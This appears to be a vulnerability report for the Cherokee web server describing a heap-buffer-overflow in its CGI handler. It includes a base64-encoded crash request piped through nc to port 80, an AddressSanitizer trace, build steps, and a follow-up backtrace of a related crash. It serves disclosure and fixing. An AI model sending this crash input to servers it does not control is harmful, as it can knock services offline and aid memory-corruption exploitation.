heap-buffer-overflow in handler cgi

[mmmds]

PoC

echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkFjY2VwdDogMTI3LjAuMC4xCkFjY2VwdC1DaGFyc2V0OiAxMjcuMC4wLjEKQWNjZXB0LUVuY29kaW5nOiAxMjcuMC4wLjEKQWNjZXB0LUxhbmd1YWdlOiAxMjcuMC4wLjEKQXV0aG9yaXphdGlvbjogMTI3LjAuMC4xCkNhY2hlLUNvbnRyb2w6IDEyNy4wLjAuMQpDaGFyZ2UtVG86IDEyNy4wLjAuMQpDb25uZWN0aW9uOiAxMjcuMC4wLjEKQ29udGVudC1UeXBlOiAxMjcuMC4wLjEKQ29va2llOiAxMjcuMC4wLjEKRE5UOiAxMjcuMC4wLjEKRXhwZWN0OiAxMjcuMC4wLjEKRm9yd2FyZGVkOiAxMjcuMC4wLjEKRnJvbTogMTI3LjAuMC4xCkZyb250LUVuZC1IdHRwZDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpJZi1NYXRjaDogMTI3LjAuMC4xCklmLU1vZGlmaWVkLVNpbmNlOiAxMjcuMC4wLjEKSWYtTm9uZS1NYXRjaDogMTI3LjAuMC4xCklmLVJhbmdlOiAxMjcuMC4wLjEKSWYtVW5tb2RpZmllZC1TaW5jZTogMTI3LjAuMC4xCktlZXAtQWxpdmU6IDEyNy4wLjAuMQpNYXgtRm9yd2FyZHM6IDEyNy4wLjAuMQpOZWdvdGlhdGU6IDEyNy4wLjAuMQpQcmFnbWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKUmVmZXJlcjogMTI3LjAuMC4xClJlZmVyZXI6IDEyNy4wLjAuMQpSZXF1ZXN0LVJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpYLUFUVC1EZXZpY2VJZDogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUhvc3Q6IDEyNy4wLjAuMQpYLUZvcndhcmRlZC1Qcm90bzogMTI3LjAuMC4xClgtRm9yd2FyZGVkLVNlcnZlcjogMTI3LjAuMC4xClgtUmVxdWVzdGVkLVdpdGg6IDEyNy4wLjAuMQpYLWxvcmktdGltZS0xOiAxMjcuMC4wLjEKWC1Eby1Ob3QtVHJhY2s6IDEyNy4wLjAuMQpYLUNvbnRlbnQtU2VjdXJpdHktUG9saWN5OiAxMjcuMC4wLjEKWC1Db250ZW50LVR5cGUtT3B0aW9uczogMTI3LjAuMC4xClgtRnJhbWUtT3B0aW9uczogMTI3LjAuMC4xClgtWFNTLVByb3RlY3Rpb246IDEyNy4wLjAuMQpYLVdhcC1Qcm9maWxlOiAxMjcuMC4wLjEKCgo=' | base64 -d | nc 127.0.0.1 80

ASAN

==26982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6180000117c0 at pc 0x559e00d26059 bp 0x7f01f18e9250 sp 0x7f01f18e9240
READ of size 8 at 0x6180000117c0 thread T4
    #0 0x559e00d26058 in cherokee_services_client_spawn /home/mmm/fuzz/webserver/cherokee/services-client.c:201
    #1 0x559e00d5dd3c in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:802
    #2 0x559e00d5a5a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
    #3 0x559e00dd244c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
    #4 0x559e00dcf233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
    #5 0x559e00d0b889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
    #6 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #7 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #8 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #9 0x7f01f651988e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)

0x6180000117c0 is located 0 bytes to the right of 832-byte region [0x618000011480,0x6180000117c0)
allocated by thread T4 here:
    #0 0x7f01f6f22b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
    #1 0x559e00d5908e in cherokee_handler_cgi_new /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:124
    #2 0x559e00dcd8b0 in cherokee_connection_create_handler /home/mmm/fuzz/webserver/cherokee/connection.c:2446
    #3 0x559e00d0b1f1 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1104
    #4 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
    #5 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
    #6 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T4 created by T0 here:   
    #0 0x7f01f6e7bd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x559e00d06219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
    #2 0x559e00cee73f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
    #3 0x559e00cf0a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
    #4 0x559e00c9476f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
    #5 0x559e00c951f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
    #6 0x7f01f6419b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/mmm/fuzz/webserver/cherokee/services-client.c:201 in cherokee_services_client_spawn
Shadow bytes around the buggy address:
  0x0c307fffa2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fffa2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffa2f0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x0c307fffa300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fffa340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==26982==ABORTING

Setup:

• Ubuntu 18.04 64 bit
• source code from github, commit 9a75e65b876bcc376cb6b379dca1f7ce4a055c59
• build command:

  ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
  make

• files in webroot mkdir /var/www/test{1..20}; for i inseq 1 20; do echo test > test$i/test.html; done
• configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust

[skinkie]

In my own test I end up with, which obviously is also something that should be fixed.

Thread 1 "cherokee-worker" received signal SIGSEGV, Segmentation fault.
0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
(gdb) bt
#0  0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#1  0x00007ffff72b3f45 in free () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#2  0x0000555555711624 in cherokee_handler_cgi_free (cgi=0x618000005480) at handler_cgi.c:240
#3  0x000055555579a8e9 in cherokee_handler_free (hdl=0x618000005480) at handler.c:72
#4  0x0000555555788d03 in cherokee_connection_setup_error_handler (conn=0x61d000006e80) at connection.c:442
#5  0x00005555556c6505 in process_active_connections (thd=0x61300000d080) at thread.c:1276
#6  0x00005555556ca112 in cherokee_thread_step_SINGLE_THREAD (thd=0x61300000d080) at thread.c:1891
#7  0x00005555556abbf6 in cherokee_server_step (srv=0x617000000080) at server.c:1161
#8  0x0000555555651591 in main (argc=1, argv=0x7fffffffd978) at main_worker.c:407